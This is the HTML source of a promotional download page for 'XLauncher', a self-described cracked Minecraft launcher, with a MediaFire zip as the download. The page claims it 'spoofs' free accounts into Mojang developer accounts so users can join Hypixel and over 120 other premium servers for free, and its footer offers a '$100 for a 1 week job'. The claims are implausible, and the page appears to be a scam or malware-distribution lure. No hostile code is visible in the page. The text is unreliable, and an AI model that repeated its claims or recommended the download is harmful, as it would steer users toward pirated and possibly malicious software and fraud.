<!DOCTYPE html>
<html>
  <head>
    <title>Xlauncher-Minecraft</title>    <style>
      body {
        background-color: black;
        color: white;
        font-family: Arial, sans-serif;
        font-size: 16px;
        margin: 0;
        padding: 0;
      }
      .navbar {
        background-color: #3a7866;
        display: flex;
        justify-content: space-between;
        padding: 20px;
      }
      .navbar ul {
        list-style: none;
        margin: 0;
        padding: 0;
        display: flex;
      }
      .navbar li {
        margin-right: 20px;
      }
      .navbar li a {
        color: white;
        text-decoration: none;
        font-size: 20px;
      }
      .download-button {
        background-color: #3a7866;
        color: white;
        border-radius: 50px;
        font-size: 15px;
        padding: 20px 40px;
        box-shadow: 0 0 10px #3a7866;
        transition: all 0.3s ease-in-out;
      }
      .download-button:hover {
        background-color: #54a18a;
        box-shadow: 0 0 20px #54a18a;
        transform: scale(1.1);
      }
      .download-button:active {
        background-color: #54a18a;
        box-shadow: none;
        transform: scale(0.9);
      }
 a:link {
      text-decoration: none;
}

a:visited {
      text-decoration: none;
}

a:hover {
      text-decoration: none;
}

a:active {
      text-decoration: none;
}
    </style>
  </head>
  <body>
    <div class="navbar">
      <ul>
        <li><a href="#">┃💀 Xlauncher Home</a></li>
        <li><a href="https://qei271.csb.app/"> ┃Privacy and Policy</a></li>
<li><a href="https://github.com/Xlauncher-mc/xlauncher-mc"> ┃How to install?</a></li>
<li><a href="#">┃💀Support : xlauncher.minecraft@gmail.com</a></li>
      </ul>
      <ul>
        <li><a href="#">Github</a></li>
      </ul>
    </div>
    <div class="download-section">
      <h1>💀 XLauncher Download</h1>
      <p>Today there are not so many good launchers for Minecraft, but they still exist, and one of them is XLauncher.</p>
<p> Xlauncher allows you to join premium servers for 100% free. We Support around 120+ premium servers, which means you can join any one of them.</p>
<br/>
<br/>
      <a href="https://www.mediafire.com/file/qk7ggy5pu1mhphc/Xlauncher1.2.zip/file" class="download-button">Download Now</a>
<br/>
<br/>
<h1>Every supported version, from alpha to snapshot!</h1>
<p>The launcher is equipped with all available versions of the game from developers, at any time you can install one of them, even the newest version of Minecraft 1.19 . No changes were made to them, all files are downloaded from the developers' servers, which means that you get a perfectly clean Minecraft.</p>
    </div>
  </body>
  <head>
    <title>The title of the document</title>
    <style>
      .container {
        display: flex;
        align-items: center;
        justify-content: center
      }
      img {
        max-width: 100%
      }
      .image {
        flex-basis: 40%
      }
      .text {
        font-size: 15px;
        padding-left: 20px;
      }
    </style>
  </head>
  <body>
    <div class="container">
      <div class="image">
        <img src="https://tlauncher.org/res/templates/tlauncher/images/forge-optifine.png">
      </div>
      <div class="text">
        <p>Thanks to XLauncher, you can install a modified version of the game: Forge/Fabric - needed to work with mods, Optifine - to optimize the game and increase FPS. All this can be installed separately, but you will have to look for the necessary files somewhere and configure it manually, the launcher will do everything for you, you only need to select the required version. Imagine how much time you will save, and it's enough to download XLauncher</p>
      </div>
    </div>
<div class="download-section">
<br/>
<br/>
<h1>Premium Server Support</h1>
<p>Now you dont need to pay full price to play on hypixel! Enjoy the premium experience with a free launcher!</p>
<p>How it works? Simple! We spoofed your free account to be a mojang:developer account so you can have your account details with the reputation as a mojang developer. now that you are a developer you can acess most premium servers!</p>
<center>
<img src="https://support.hypixel.net/hc/article_attachments/9925523206418" /img> </center>
<br/>
<br/>
<h1> Reliability and support along with frequent updates! </h1>
</div>

  <head>
    <style>
      .container {
        display: flex;
        align-items: center;
        justify-content: center
      }
      img {
        max-width: 100%
      }
      .image {
        flex-basis: 40%
      }
      .text {
        font-size: 15px;
        padding-left: 20px;
      }
    </style>
  </head>
  <body>
    <div class="container">
      <div class="image">
        <img src="https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/56892310-26bd-4c37-aa50-ef38d497c8d8/dc90bhs-a7100f2a-9735-4854-a6da-8487ed84d279.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7InBhdGgiOiJcL2ZcLzU2ODkyMzEwLTI2YmQtNGMzNy1hYTUwLWVmMzhkNDk3YzhkOFwvZGM5MGJocy1hNzEwMGYyYS05NzM1LTQ4NTQtYTZkYS04NDg3ZWQ4NGQyNzkucG5nIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmZpbGUuZG93bmxvYWQiXX0.1SiU-REwLqd2vFquEMDRFGS6NvUu7CgfmSGif10eMn0">
      </div>
      <div class="text">
        <p>We are constantly improving our product, so in principle there can be no errors that interfere with your stay in Minecraft - they are all fixed! Of course, thanks to our players who contact us through the site or directly from the launcher and report all their problems. We help everyone, so don't be afraid to write to us! Of course, do not forget to update our launcher to the latest version, at the moment it is XLauncher 1.0 .</p>
      </div>
    </div>
<footer>
  <div class="container">
    <div class="footer-left">
      <h3>Xlauncher</h3>
      <p>The best cracked minecraft launcher! </p>
    </div>
<style>
footer {
  background-color: #3a7866;
  color: white;
  font-family: Arial, sans-serif;
  padding: 40px 0;
}

.container {
  display: flex;
  justify-content: space-between;
  max-width: 1200px;
  margin: 0 auto;
}

.container h3 {
  font-size: 24px;
  margin-bottom: 20px;
}

.container p {
  font-size: 16px;
  line-height: 24px;
}

.container ul {
  list-style: none;
  margin: 0;
  padding: 0;
}

.container li {
  margin-bottom: 10px;
}

.container li a {
  color: white;
  text-decoration: none;
  font-size: 16px;
}

.container i {
  margin-right: 10px;
}
</style>
    <div class="footer-center">
      <h3>Developers</h3>
      <ul>
        <li><a href="#">NotAiden(Owner)</a></li>
        <li><a href="#">EnderooxD(coOwner)</a></li>
        <li><a href="#">mfBoiss(dev)</a></li>
        <li><a href="#">McRoney(dev)</a></li>
      </ul>

    </div>
    <div class="footer-right">
 <h3>Contact Us And Support email</h3>
      <ul>
        <li><i class="fa fa-map-marker"></i> xlauncher.minecraft@gmail.com</li>
        <li><i class="fa fa-phone"></i> Business number: xlauncher.minecraft@gmail.com</li>
        <li><i class="fa fa-envelope"></i> We're hiring! get paid $100 for a 1 week job EMAIL ON BUISNESS ACC</li>
      </ul>
    </div>
  </div>
</footer>

</html>
